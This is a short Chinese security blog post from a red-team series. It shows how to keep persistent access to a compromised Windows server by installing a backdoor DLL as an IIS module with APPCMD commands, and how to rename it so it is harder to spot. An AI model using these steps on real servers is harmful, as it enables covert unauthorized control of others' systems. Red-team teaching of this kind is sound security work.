【红蓝攻防】红队中的内网权限维持(2)

admin
admin
admin
138657
文章
114
评论
2021年3月7日14:52:22评论274 views字数 542阅读1分48秒阅读模式

IIS - Module后门

把后门dll放到  C:WindowsSystem32inetsrv,增加隐蔽性(可以自己改名)

copy IIS-Backdoor.dll %windir%System32inetsrvIIS-Backdoor.dll

安装后门

C:Windowssystem32inetsrvAPPCMD.EXE install module /name:0-sec /image:"%windir%System32inetsrvIIS-Backdoor.dll" /add:true

删除后门

C:Windowssystem32inetsrvAPPCMD.EXE uninstall module 0-sec

查看已安装模块

C:Windowssystem32inetsrvAPPCMD.EXE list module


运行inetmgr.exe,进入IIS管理器,选择Modules

【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)


再通过主控端进行命令执行操作


【红蓝攻防】红队中的内网权限维持(2)【红蓝攻防】红队中的内网权限维持(2)

流量分析


【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)


再次访问模块,发现刚刚新建的模块直接显示的就是绝对路径泄漏的太明显了。我们重新编辑修改一下

【红蓝攻防】红队中的内网权限维持(2)

【红蓝攻防】红队中的内网权限维持(2)


最后再来个有奖竞答,底下截图的模块里,哪一个才是后门?


第一个留言回答正确的奖励文库邀请码一枚,如果有账号则加20信誉值积分。


【红蓝攻防】红队中的内网权限维持(2)


本文始发于微信公众号(零组攻防实验室):【红蓝攻防】红队中的内网权限维持(2)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年3月7日14:52:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【红蓝攻防】红队中的内网权限维持(2)https://cn-sec.com/archives/283032.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息